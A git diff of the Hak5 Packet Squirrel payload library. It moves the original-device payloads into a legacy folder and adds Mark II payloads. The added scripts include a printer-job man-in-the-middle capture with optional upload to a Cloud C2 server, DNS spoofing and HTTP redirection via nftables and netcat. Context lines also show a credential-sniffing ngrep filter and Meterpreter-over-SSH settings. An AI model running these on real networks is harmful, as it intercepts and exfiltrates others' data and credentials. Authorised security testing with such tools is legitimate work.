diff --git a/README.md b/README.md index 2752ede..53cc292 100644 --- a/README.md +++ b/README.md @@ -1,39 +1,63 @@ # Payload Library for the Packet Squirrel by Hak5 -This repository contains payloads and extensions for the Hak5 Packet Squirrel. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads. +This repository contains payloads and extensions for the Hak5 Packet Squirrel, developed by the Hak5 Community. + +Have a great payload? Submit it by forking the payload repository and submitting a pull request!A + +Learn more about Github pull requests [here](https://docs.github.com/en/pull-requests/collaborating-with-pull-requests/proposing-changes-to-your-work-with-pull-requests/about-pull-requests) or from the Hak5 Bash Bunny tutorial [here](https://www.youtube.com/watch?v=H6z9BXevsZg). + +## Packet Squirrel Versions + +The Packet Squirrel Mark II expands on the capabilities of the original Packet Squirrel, introducing new commands and more flexible networking configurations. + +Payloads for the original Packet Squirrel can be found in the `legacy-mk1` directory. These payloads may not work without modification on the Packet Squirrel Mark II. ## About the Packet Squirrel -The Packet Squirrel by Hak5 is a stealthy pocket-sized man-in-the-middle. +The Packet Squirrel Mark II by Hak5 is a stealthy pocket-sized man-in-the-middle. This Ethernet multi-tool is designed to give you covert remote access, painless packet captures, and secure VPN connections with the flip of a switch. - [Purchase at Hak5](https://hak5.org/products/packet-squirrel "Purchase at Hak5") -- [Documentation](https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel "Documentation") +- [Documentation](https://docs.hak5.org/packet-squirrel-mark-ii "Documentation") - [Forums](https://forums.hak5.org/forum/94-packet-squirrel/ "Forums") - [Discord](https://hak5.org/discord "Discord") ![Packet Squirrel](https://cdn.shopify.com/s/files/1/0068/2142/products/Packet_Squirrel_300x.jpg) ## Updating + If you've downloaded this repository via `git`, you can update to the latest versions of the payloads with `git pull`. If you downloaded as a zip or other file, please download the latest from [github](https://github.com/hak5/packetsquirrel-payloads/). ## Disclaimer -Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution. + +Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness or safety. As with any script, you are advised to proceed with caution. ## Legal + Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use. ## Contributing -Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available. + +Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publicly available. Please adhere to the following best practices and style guide when submitting a payload. +Hak5 reserves the right to modify payloads to meet the guidelines when necessary, or to decline to include a payload in the public repository. + +Please ensure that any default configuration values do not point to actual services! Do not include *your* passwords or login information in submitted payloads! + ### Naming Conventions -Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category. + +Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be placed into its own directory, with `-` or `_` used in place of spaces, in one of the categories such as exfiltration, phishing, remote_access or recon. Please do not create your own category. + +The payload itself should be named `payload`. + +Additional files and documentation can be included in the payload directory. Documentation should be in `README.md` or `README.txt`. ### Comments + Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful. # Title: Meterpreter-via-SSH @@ -53,6 +77,7 @@ Payloads should begin with comments specifying at the very least the name of the # Cyan Blink 1 Time - Meterpreter Successful ### Configuration Options + Configurable options should be specified in variables at the top of the payload.txt file # Options @@ -61,9 +86,11 @@ Configurable options should be specified in variables at the top of the payload. MSF_PORT=31337 ### LED + The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or `NETMODE`. LED SETUP NETMODE NAT Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states. + diff --git a/legacy-mk1/README.md b/legacy-mk1/README.md new file mode 100644 index 0000000..60a5e16 --- /dev/null +++ b/legacy-mk1/README.md @@ -0,0 +1,75 @@ +# Legacy payloads + +These payloads are for the original Packet Squirrel device. + +They may or may not run without modification on the Packet Squirrel Mark II. + + +## Payload Library for the Packet Squirrel by Hak5 + +This repository contains payloads and extensions for the Hak5 Packet Squirrel. Community developed payloads are listed and developers are encouraged to create pull requests to make changes to or submit new payloads. + +## About the Packet Squirrel + +The Packet Squirrel by Hak5 is a stealthy pocket-sized man-in-the-middle. + +This Ethernet multi-tool is designed to give you covert remote access, painless packet captures, and secure VPN connections with the flip of a switch. + +- [Purchase at Hak5](https://hak5.org/products/packet-squirrel "Purchase at Hak5") +- [Documentation](https://docs.hak5.org/hc/en-us/categories/360000982574-Packet-Squirrel "Documentation") +- [Forums](https://forums.hak5.org/forum/94-packet-squirrel/ "Forums") +- [Discord](https://hak5.org/discord "Discord") + +![Packet Squirrel](https://cdn.shopify.com/s/files/1/0068/2142/products/Packet_Squirrel_300x.jpg) + +## Updating +If you've downloaded this repository via `git`, you can update to the latest versions of the payloads with `git pull`. If you downloaded as a zip or other file, please download the latest from [github](https://github.com/hak5/packetsquirrel-payloads/). + +## Disclaimer +Generally, payloads may execute commands on your device. As such, it is possible for a payload to damage your device. Payloads from this repository are provided AS-IS without warranty. While Hak5 makes a best effort to review payloads, there are no guarantees as to their effectiveness. As with any script, you are advised to proceed with caution. + +## Legal +Payloads from this repository are provided for educational purposes only. Hak5 gear is intended for authorized auditing and security analysis purposes only where permitted subject to local and international laws where applicable. Users are solely responsible for compliance with all laws of their locality. Hak5 LLC and affiliates claim no responsibility for unauthorized or unlawful use. + +## Contributing +Once you have developed your payload, you are encouraged to contribute to this repository by submitting a Pull Request. Reviewed and Approved pull requests will add your payload to this repository, where they may be publically available. + +Please adhere to the following best practices and style guide when submitting a payload. + +### Naming Conventions +Please give your payload a unique and descriptive name. Do not use spaces in payload names. Each payload should be submit into its own directory, with `-` or `_` used in place of spaces, to one of the categories such as exfiltration, phishing, remote_access or recon. Do not create your own category. + +### Comments +Payloads should begin with comments specifying at the very least the name of the payload and author. Additional information such as a brief description, the target, any dependencies / prerequisites and the LED status used is helpful. + + # Title: Meterpreter-via-SSH + # Description: Covert meterpreter shell via overt SSH connection + # Author: Zappus + # Version: 1.0 + # Category: Remote-Access + # Net Mode: NAT + # Firmware: 1.2 + # + # LED State Descriptions + # Magenta Solid - Configuring NETMODE + # LED OFF - Waiting for BUTTON + # Red Blink 2 Times - SSH Connection Failed + # Amber Blink 5 Times - SSH Connection Successful + # Red Blink 1 Time - Meterpreter Failed + # Cyan Blink 1 Time - Meterpreter Successful + +### Configuration Options +Configurable options should be specified in variables at the top of the payload.txt file + + # Options + SSH_USER="username" + SSH_HOST="hostname" + MSF_PORT=31337 + +### LED +The payload should use common payload states rather than unique color/pattern combinations when possible with an LED command preceding the Stage or `NETMODE`. + + LED SETUP + NETMODE NAT + +Common payload states include a `SETUP`, with may include a `FAIL` if certain conditions are not met. This is typically followed by either a single `ATTACK` or multiple `STAGEs`. More complex payloads may include a `SPECIAL` function to wait until certain conditions are met. Payloads commonly end with a `CLEANUP` phase, such as moving and deleting files or stopping services. A payload may `FINISH` when the objective is complete and the device is safe to eject or turn off. These common payload states correspond to `LED` states. diff --git a/payloads/library/exfiltration/Email-Sender/README.md b/legacy-mk1/payloads/library/exfiltration/Email-Sender/README.md similarity index 100% rename from payloads/library/exfiltration/Email-Sender/README.md rename to legacy-mk1/payloads/library/exfiltration/Email-Sender/README.md diff --git a/payloads/library/exfiltration/Email-Sender/SENDMAIL b/legacy-mk1/payloads/library/exfiltration/Email-Sender/SENDMAIL similarity index 100% rename from payloads/library/exfiltration/Email-Sender/SENDMAIL rename to legacy-mk1/payloads/library/exfiltration/Email-Sender/SENDMAIL diff --git a/payloads/library/exfiltration/Email-Sender/payload.sh b/legacy-mk1/payloads/library/exfiltration/Email-Sender/payload.sh old mode 100644 new mode 100755 similarity index 86% rename from payloads/library/exfiltration/Email-Sender/payload.sh rename to legacy-mk1/payloads/library/exfiltration/Email-Sender/payload.sh index 0418657..0616e8a --- a/payloads/library/exfiltration/Email-Sender/payload.sh +++ b/legacy-mk1/payloads/library/exfiltration/Email-Sender/payload.sh @@ -1,5 +1,8 @@ #!/bin/bash +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II + function run() { LED STAGE1 SWITCH_POS=$(SWITCH) diff --git a/payloads/library/exfiltration/Email-Sender/sendemail.py b/legacy-mk1/payloads/library/exfiltration/Email-Sender/sendemail.py similarity index 100% rename from payloads/library/exfiltration/Email-Sender/sendemail.py rename to legacy-mk1/payloads/library/exfiltration/Email-Sender/sendemail.py diff --git a/payloads/library/exfiltration/FreeDaNutz/README.md b/legacy-mk1/payloads/library/exfiltration/FreeDaNutz/README.md similarity index 100% rename from payloads/library/exfiltration/FreeDaNutz/README.md rename to legacy-mk1/payloads/library/exfiltration/FreeDaNutz/README.md diff --git a/payloads/library/exfiltration/FreeDaNutz/payload.sh b/legacy-mk1/payloads/library/exfiltration/FreeDaNutz/payload.sh similarity index 98% rename from payloads/library/exfiltration/FreeDaNutz/payload.sh rename to legacy-mk1/payloads/library/exfiltration/FreeDaNutz/payload.sh index 07f3633..b6e12f1 100644 --- a/payloads/library/exfiltration/FreeDaNutz/payload.sh +++ b/legacy-mk1/payloads/library/exfiltration/FreeDaNutz/payload.sh @@ -1,5 +1,8 @@ #!/bin/bash # +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: FreeDaNutz # Description: This payload will compress the loot folder and then send that file to a remote server via scp diff --git a/payloads/library/general/I-Hate-Wifi/README.md b/legacy-mk1/payloads/library/general/I-Hate-Wifi/README.md similarity index 100% rename from payloads/library/general/I-Hate-Wifi/README.md rename to legacy-mk1/payloads/library/general/I-Hate-Wifi/README.md diff --git a/payloads/library/general/I-Hate-Wifi/payload.sh b/legacy-mk1/payloads/library/general/I-Hate-Wifi/payload.sh old mode 100644 new mode 100755 similarity index 88% rename from payloads/library/general/I-Hate-Wifi/payload.sh rename to legacy-mk1/payloads/library/general/I-Hate-Wifi/payload.sh index 594c46b..6ea1683 --- a/payloads/library/general/I-Hate-Wifi/payload.sh +++ b/legacy-mk1/payloads/library/general/I-Hate-Wifi/payload.sh @@ -1,5 +1,8 @@ #!/bin/bash +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II + function scan() { LED G ifconfig wlan0 down diff --git a/payloads/library/general/Wake-On-Lan/README.md b/legacy-mk1/payloads/library/general/Wake-On-Lan/README.md similarity index 100% rename from payloads/library/general/Wake-On-Lan/README.md rename to legacy-mk1/payloads/library/general/Wake-On-Lan/README.md diff --git a/payloads/library/general/Wake-On-Lan/payload.sh b/legacy-mk1/payloads/library/general/Wake-On-Lan/payload.sh old mode 100644 new mode 100755 similarity index 82% rename from payloads/library/general/Wake-On-Lan/payload.sh rename to legacy-mk1/payloads/library/general/Wake-On-Lan/payload.sh index dc71da8..9b273d6 --- a/payloads/library/general/Wake-On-Lan/payload.sh +++ b/legacy-mk1/payloads/library/general/Wake-On-Lan/payload.sh @@ -1,4 +1,8 @@ #!/bin/bash + +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II + LED STAGE1 NETMODE NAT diff --git a/payloads/library/general/Wake-On-Lan/wol.py b/legacy-mk1/payloads/library/general/Wake-On-Lan/wol.py similarity index 100% rename from payloads/library/general/Wake-On-Lan/wol.py rename to legacy-mk1/payloads/library/general/Wake-On-Lan/wol.py diff --git a/payloads/library/general/caternet/index.html b/legacy-mk1/payloads/library/general/caternet/index.html similarity index 100% rename from payloads/library/general/caternet/index.html rename to legacy-mk1/payloads/library/general/caternet/index.html diff --git a/payloads/library/general/caternet/kerby1.jpg b/legacy-mk1/payloads/library/general/caternet/kerby1.jpg similarity index 100% rename from payloads/library/general/caternet/kerby1.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby1.jpg diff --git a/payloads/library/general/caternet/kerby2.jpg b/legacy-mk1/payloads/library/general/caternet/kerby2.jpg similarity index 100% rename from payloads/library/general/caternet/kerby2.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby2.jpg diff --git a/payloads/library/general/caternet/kerby3.jpg b/legacy-mk1/payloads/library/general/caternet/kerby3.jpg similarity index 100% rename from payloads/library/general/caternet/kerby3.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby3.jpg diff --git a/payloads/library/general/caternet/kerby4.jpg b/legacy-mk1/payloads/library/general/caternet/kerby4.jpg similarity index 100% rename from payloads/library/general/caternet/kerby4.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby4.jpg diff --git a/payloads/library/general/caternet/kerby5.jpg b/legacy-mk1/payloads/library/general/caternet/kerby5.jpg similarity index 100% rename from payloads/library/general/caternet/kerby5.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby5.jpg diff --git a/payloads/library/general/caternet/kerby6.jpg b/legacy-mk1/payloads/library/general/caternet/kerby6.jpg similarity index 100% rename from payloads/library/general/caternet/kerby6.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby6.jpg diff --git a/payloads/library/general/caternet/kerby7.jpg b/legacy-mk1/payloads/library/general/caternet/kerby7.jpg similarity index 100% rename from payloads/library/general/caternet/kerby7.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby7.jpg diff --git a/payloads/library/general/caternet/kerby8.jpg b/legacy-mk1/payloads/library/general/caternet/kerby8.jpg similarity index 100% rename from payloads/library/general/caternet/kerby8.jpg rename to legacy-mk1/payloads/library/general/caternet/kerby8.jpg diff --git a/payloads/library/general/caternet/kerby9.JPG b/legacy-mk1/payloads/library/general/caternet/kerby9.JPG similarity index 100% rename from payloads/library/general/caternet/kerby9.JPG rename to legacy-mk1/payloads/library/general/caternet/kerby9.JPG diff --git a/payloads/library/general/caternet/payload.sh b/legacy-mk1/payloads/library/general/caternet/payload.sh similarity index 75% rename from payloads/library/general/caternet/payload.sh rename to legacy-mk1/payloads/library/general/caternet/payload.sh index a101842..bd90120 100644 --- a/payloads/library/general/caternet/payload.sh +++ b/legacy-mk1/payloads/library/general/caternet/payload.sh @@ -1,4 +1,8 @@ # Title: Caternet +# +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Author: Hak5Darren # Version: 1.0 # Description: Forwards all traffic to local webserver hosting cat photos. diff --git a/payloads/library/interception/dnsspoof/payload.sh b/legacy-mk1/payloads/library/interception/dnsspoof/payload.sh similarity index 86% rename from payloads/library/interception/dnsspoof/payload.sh rename to legacy-mk1/payloads/library/interception/dnsspoof/payload.sh index b83951a..7097bae 100755 --- a/payloads/library/interception/dnsspoof/payload.sh +++ b/legacy-mk1/payloads/library/interception/dnsspoof/payload.sh @@ -1,4 +1,7 @@ #!/bin/bash +# +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II # # Title: DNSSpoof # Description: Forge replies to arbitrary DNS queries using DNSMasq diff --git a/payloads/library/interception/dnsspoof/spoofhost b/legacy-mk1/payloads/library/interception/dnsspoof/spoofhost similarity index 100% rename from payloads/library/interception/dnsspoof/spoofhost rename to legacy-mk1/payloads/library/interception/dnsspoof/spoofhost diff --git a/payloads/library/recon/ipinfo/payload.txt b/legacy-mk1/payloads/library/recon/ipinfo/payload.txt old mode 100644 new mode 100755 similarity index 94% rename from payloads/library/recon/ipinfo/payload.txt rename to legacy-mk1/payloads/library/recon/ipinfo/payload.txt index b7517fe..7fd7c8e --- a/payloads/library/recon/ipinfo/payload.txt +++ b/legacy-mk1/payloads/library/recon/ipinfo/payload.txt @@ -1,5 +1,8 @@ #!/bin/bash # +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: IP Info # Author: Hak5Darren # Version: 1.0 diff --git a/payloads/library/recon/nmapdump/README.md b/legacy-mk1/payloads/library/recon/nmapdump/README.md similarity index 100% rename from payloads/library/recon/nmapdump/README.md rename to legacy-mk1/payloads/library/recon/nmapdump/README.md diff --git a/payloads/library/recon/nmapdump/payload.sh b/legacy-mk1/payloads/library/recon/nmapdump/payload.sh similarity index 98% rename from payloads/library/recon/nmapdump/payload.sh rename to legacy-mk1/payloads/library/recon/nmapdump/payload.sh index 9b09131..0cadbd1 100644 --- a/payloads/library/recon/nmapdump/payload.sh +++ b/legacy-mk1/payloads/library/recon/nmapdump/payload.sh @@ -1,5 +1,8 @@ #!/bin/bash # +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: NMap Dump # Description: Dumps NMap scan data to USB storage. # Author: infoskirmish.com diff --git a/payloads/library/remote-access/Meterpreter-via-SSH/README.md b/legacy-mk1/payloads/library/remote-access/Meterpreter-via-SSH/README.md similarity index 100% rename from payloads/library/remote-access/Meterpreter-via-SSH/README.md rename to legacy-mk1/payloads/library/remote-access/Meterpreter-via-SSH/README.md diff --git a/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh b/legacy-mk1/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh old mode 100644 new mode 100755 similarity index 95% rename from payloads/library/remote-access/Meterpreter-via-SSH/payload.sh rename to legacy-mk1/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh index aae8991..006d2dc --- a/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh +++ b/legacy-mk1/payloads/library/remote-access/Meterpreter-via-SSH/payload.sh @@ -1,4 +1,8 @@ #!/bin/bash +# +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: Meterpreter-via-SSH # Description: Covert meterpreter shell via overt SSH connection # Author: Zappus diff --git a/payloads/library/remote-access/Meterpreter-via-SSH/server.rc b/legacy-mk1/payloads/library/remote-access/Meterpreter-via-SSH/server.rc similarity index 100% rename from payloads/library/remote-access/Meterpreter-via-SSH/server.rc rename to legacy-mk1/payloads/library/remote-access/Meterpreter-via-SSH/server.rc diff --git a/payloads/library/remote-access/SSH-remote-access/payload.sh b/legacy-mk1/payloads/library/remote-access/SSH-remote-access/payload.sh old mode 100644 new mode 100755 similarity index 95% rename from payloads/library/remote-access/SSH-remote-access/payload.sh rename to legacy-mk1/payloads/library/remote-access/SSH-remote-access/payload.sh index a12680f..6c61da0 --- a/payloads/library/remote-access/SSH-remote-access/payload.sh +++ b/legacy-mk1/payloads/library/remote-access/SSH-remote-access/payload.sh @@ -1,4 +1,8 @@ #!/bin/bash +# +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: SSH Remote Management Tool for Packet Squirrel # Description: Makes packet Squirrel directly accessible via SSH on a remote server # Author: BlackPropaganda @@ -85,4 +89,4 @@ uci commit autossh LED ATTACK # starting autossh -/etc/init.d/autossh start \ No newline at end of file +/etc/init.d/autossh start diff --git a/payloads/library/remote-access/SSH-remote-access/readme.md b/legacy-mk1/payloads/library/remote-access/SSH-remote-access/readme.md similarity index 100% rename from payloads/library/remote-access/SSH-remote-access/readme.md rename to legacy-mk1/payloads/library/remote-access/SSH-remote-access/readme.md diff --git a/payloads/library/remote-access/Togglable-VPN/payload.sh b/legacy-mk1/payloads/library/remote-access/Togglable-VPN/payload.sh similarity index 89% rename from payloads/library/remote-access/Togglable-VPN/payload.sh rename to legacy-mk1/payloads/library/remote-access/Togglable-VPN/payload.sh index 1490660..c93c0ba 100644 --- a/payloads/library/remote-access/Togglable-VPN/payload.sh +++ b/legacy-mk1/payloads/library/remote-access/Togglable-VPN/payload.sh @@ -1,5 +1,8 @@ #!/bin/bash # +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: Togglable-VPN # Description: Based on the default VPN payload; this can now create a VPN-connection to an OpenVPN-server, # or if the button is pressed, send traffic from the clients through said tunnel. diff --git a/payloads/library/remote-access/openvpn/config.ovpn b/legacy-mk1/payloads/library/remote-access/openvpn/config.ovpn similarity index 100% rename from payloads/library/remote-access/openvpn/config.ovpn rename to legacy-mk1/payloads/library/remote-access/openvpn/config.ovpn diff --git a/payloads/library/remote-access/openvpn/payload.sh b/legacy-mk1/payloads/library/remote-access/openvpn/payload.sh similarity index 92% rename from payloads/library/remote-access/openvpn/payload.sh rename to legacy-mk1/payloads/library/remote-access/openvpn/payload.sh index 37bf7b3..4e65160 100755 --- a/payloads/library/remote-access/openvpn/payload.sh +++ b/legacy-mk1/payloads/library/remote-access/openvpn/payload.sh @@ -1,5 +1,8 @@ #!/bin/bash # +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: OpenVPN # Description: Create a connection to a VPN-connection to an OpenVPN-server. Optionally: Send traffic from the clients through said tunnel. # Author: Hak5 diff --git a/payloads/library/sniffing/ispyintel/README.md b/legacy-mk1/payloads/library/sniffing/ispyintel/README.md similarity index 100% rename from payloads/library/sniffing/ispyintel/README.md rename to legacy-mk1/payloads/library/sniffing/ispyintel/README.md diff --git a/payloads/library/sniffing/ispyintel/payload.sh b/legacy-mk1/payloads/library/sniffing/ispyintel/payload.sh similarity index 97% rename from payloads/library/sniffing/ispyintel/payload.sh rename to legacy-mk1/payloads/library/sniffing/ispyintel/payload.sh index 65a7b54..80da2b2 100644 --- a/payloads/library/sniffing/ispyintel/payload.sh +++ b/legacy-mk1/payloads/library/sniffing/ispyintel/payload.sh @@ -1,5 +1,8 @@ #!/bin/bash # +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: iSpy Passive Intel Gathering # Description: Launches various tools to sniff out intel data. diff --git a/payloads/library/sniffing/ngrep/payload.sh b/legacy-mk1/payloads/library/sniffing/ngrep/payload.sh old mode 100644 new mode 100755 similarity index 89% rename from payloads/library/sniffing/ngrep/payload.sh rename to legacy-mk1/payloads/library/sniffing/ngrep/payload.sh index ed90c40..e18c20b --- a/payloads/library/sniffing/ngrep/payload.sh +++ b/legacy-mk1/payloads/library/sniffing/ngrep/payload.sh @@ -1,4 +1,8 @@ #!/bin/bash +# +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # ngrep payload to snag creds NGREP_OPTIONS=("-wiql" "user|pass" "port" "21") diff --git a/payloads/library/sniffing/ngrep/readme.md b/legacy-mk1/payloads/library/sniffing/ngrep/readme.md similarity index 100% rename from payloads/library/sniffing/ngrep/readme.md rename to legacy-mk1/payloads/library/sniffing/ngrep/readme.md diff --git a/payloads/library/sniffing/tcpdump/payload.sh b/legacy-mk1/payloads/library/sniffing/tcpdump/payload.sh similarity index 91% rename from payloads/library/sniffing/tcpdump/payload.sh rename to legacy-mk1/payloads/library/sniffing/tcpdump/payload.sh index c7c4101..971624b 100755 --- a/payloads/library/sniffing/tcpdump/payload.sh +++ b/legacy-mk1/payloads/library/sniffing/tcpdump/payload.sh @@ -1,5 +1,8 @@ #!/bin/bash # +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# # Title: TCPDump # Description: Dumps networking-data to USB storage. Completes on button-press or storage full. # Author: Hak5 diff --git a/payloads/switch1/payload.sh b/legacy-mk1/payloads/switch1/payload.sh similarity index 100% rename from payloads/switch1/payload.sh rename to legacy-mk1/payloads/switch1/payload.sh diff --git a/payloads/switch2/payload.sh b/legacy-mk1/payloads/switch2/payload.sh similarity index 100% rename from payloads/switch2/payload.sh rename to legacy-mk1/payloads/switch2/payload.sh diff --git a/payloads/switch3/payload.sh b/legacy-mk1/payloads/switch3/payload.sh similarity index 100% rename from payloads/switch3/payload.sh rename to legacy-mk1/payloads/switch3/payload.sh diff --git a/payloads/exfiltration/pcl_printer/payload b/payloads/exfiltration/pcl_printer/payload new file mode 100755 index 0000000..4e588e7 --- /dev/null +++ b/payloads/exfiltration/pcl_printer/payload @@ -0,0 +1,53 @@ +#!/bin/bash + +# Title: PCL Printer Capture +# Description: Capture PCL IP printer jobs with a dynamic proxy +# Author: Hak5 + +# To convert PCL files to PDF, use a tool like GhostPCL: +# https://ghostscript.com/releases/gpcldnld.html +# +# To convert a stream (captured-file.stream) to PDF (printed.pdf), use something +# like: +# ./gpcl6-1000-linux-x86_64 -o printed.pdf -sDEVICE=pdfwrite captured-file.stream + +# Do we automatically exfiltrate to Cloud C2? Uncomment to send files to your +# CloudC2 server automatically +# +# USE_C2=1 + +# By default, C2WATCHDIR removes files after they're sent. To keep them, uncomment +# C2_KEEP_FILES below +# +# C2_KEEP_FILES=1 + +LED SETUP + +NETMODE NAT + +# We have to have attached USB +USB_WAIT + +# Make sure the directory exists +mkdir /usb/printer/ + +# If USE_C2 isn't empty, we're uploading to CloudC2 +if [[ ! -z "$USE_C2" ]]; then + # If C2_KEEP_FILES is not empty, we want to preserve the + # files on USB, otherwise run C2WATCHDIR normally and delete + # the files after they are sent. + if [[ ! -z "$C2_KEEP_FILES" ]]; then + C2_KEEP_FILES=1 C2WATCHDIR /usb/printer/ & + else + C2WATCHDIR /usb/printer/ & + fi + + # Give C2WATCHDIR a moment to sync any old files that were present + sleep 3 +fi + +LED ATTACK + +# Use a dynamic proxy to MITM standard PCL IP printers +DYNAMICPROXY CLIENT /usb/printer/print_ 9100 + diff --git a/payloads/general/gatekeeper/payload b/payloads/general/gatekeeper/payload new file mode 100755 index 0000000..9b5ce90 --- /dev/null +++ b/payloads/general/gatekeeper/payload @@ -0,0 +1,32 @@ +#!/bin/bash + +# Title: Gatekeeper +# +# Description: Toggle access to the network with the pushbutton +# Author: Hak5 + +# Set the default network mode (such as NAT or BRIDGE) +NETWORK_MODE="BRIDGE" + +NETMODE ${NETWORK_MODE} + +LED G SOLID + +while true; do + # Run the buttom command with no LED; this way the LED stays + # solid green + NO_LED=1 BUTTON + + # Check the existing network mode; if we're not the right mode, + # send the target device to jail + if [ $(cat /tmp/squirrel_netmode) == "${NETWORK_MODE}" ]; then + LED R FAST + NETMODE JAIL + LED R SOLID + else + # Set the network mode back to our normal mode + LED G FAST + NETMODE ${NETWORK_MODE} + LED G SOLID + fi +done diff --git a/payloads/interception/dns_sinkhole/payload b/payloads/interception/dns_sinkhole/payload new file mode 100755 index 0000000..93c7064 --- /dev/null +++ b/payloads/interception/dns_sinkhole/payload @@ -0,0 +1,14 @@ +#!/bin/bash + +# Title: DNS Sinkhole +# Description: Demonstrate sinkholing a DNS domain (hak5.org) +# Author: Hak5 + +# This payload will intercept any requests for a *.hak5.org domain +# and redirect them to localhost (127.0.0.1 for IPv4 or ::1 for IPv6) + +NETMODE BRIDGE + +LED R SINGLE + +SPOOFDNS br-lan '.*.hak5.org=127.0.0.1' 'hak5.org=127.0.0.1' '.*.hak5.org=::1' 'hak5.org=::1' diff --git a/payloads/interception/web_intercept/payload b/payloads/interception/web_intercept/payload new file mode 100755 index 0000000..fc8da16 --- /dev/null +++ b/payloads/interception/web_intercept/payload @@ -0,0 +1,30 @@ +#!/bin/bash + +# Title: Minimalistic web intercept +# Description: Replace HTTP with Squirrels. +# Author: Hak5 +# +# squirrel.jpg from Wikipedia +# https://upload.wikimedia.org/wikipedia/commons/6/68/Sciuridae.jpg +# By Chicoutimi (montage)KarakalAndiWNational Park Serviceen +# User:Markus KrötzschThe Lilac Breasted RollerNico Conradie from Centurion, +# South AfricaHans HillewaertSylvouilleNational Park Service - Own work, CC BY 3.0, +# https://commons.wikimedia.org/w/index.php?curid=10213698 + +NETMODE NAT +LED B SOLID + +# Add a web payload to the nftables +nft add table ip webpayload + +# Hook prerouting +nft -- add chain ip webpayload prerouting { type nat hook prerouting priority -100 \; } + +# Redirect port 80 to our local 8080 +nft add rule ip webpayload prerouting tcp dport 80 redirect to :8080 + +while true; + do echo -e "HTTP/1.1 200 OK\nContent-Type: image/jpeg\n" | \ + cat - /root/payloads/$(SWITCH)/squirrel.jpg | \ + netcat -l -p 8080; +done diff --git a/payloads/interception/web_intercept/squirrel.jpg b/payloads/interception/web_intercept/squirrel.jpg new file mode 100644 index 0000000..5a9ab26 Binary files /dev/null and b/payloads/interception/web_intercept/squirrel.jpg differ diff --git a/payloads/recon/nmapdump/README.md b/payloads/recon/nmapdump/README.md new file mode 100644 index 0000000..76a9efe --- /dev/null +++ b/payloads/recon/nmapdump/README.md @@ -0,0 +1,30 @@ +Title: NMap Dump + +Description: Dumps NMap scan data to USB storage. + +Author: infoskirmish.com + +Version: 2.0 + +Category: sniffing + +Target: Any + +Net Mode: NAT + + +LEDs + +SUCCESS: Scan complete + +FAIL: No USB storage found + +SCANNING: Rapid White + +This payload will launch NMap on a given interface (default eth0) and scan the local subnet. There is no need to know the subnet as the payload will capture and infer the subnet from the IP it receives while launching. + +The payload will store scan files in all three file types supported by nmap. Also the payload will create a log.txt file to dump process information which may be useful to troubleshoot errors. The default path is /mnt/loot/nmapdump + +The payload has common variables that maybe changed located at the top of the file making customizing this payload as your deployment needs dictate. + +Updated for the Packet Squirrel Mark II by Hak5 diff --git a/payloads/recon/nmapdump/payload.sh b/payloads/recon/nmapdump/payload.sh new file mode 100644 index 0000000..f1c333f --- /dev/null +++ b/payloads/recon/nmapdump/payload.sh @@ -0,0 +1,276 @@ +#!/bin/bash +# +# This payload is for the original Packet Squirrel. It may not work on +# the Packet Squirrel Mark II +# +# Title: NMap Dump +# Description: Dumps NMap scan data to USB storage. +# Author: infoskirmish.com +# Version: 2.0 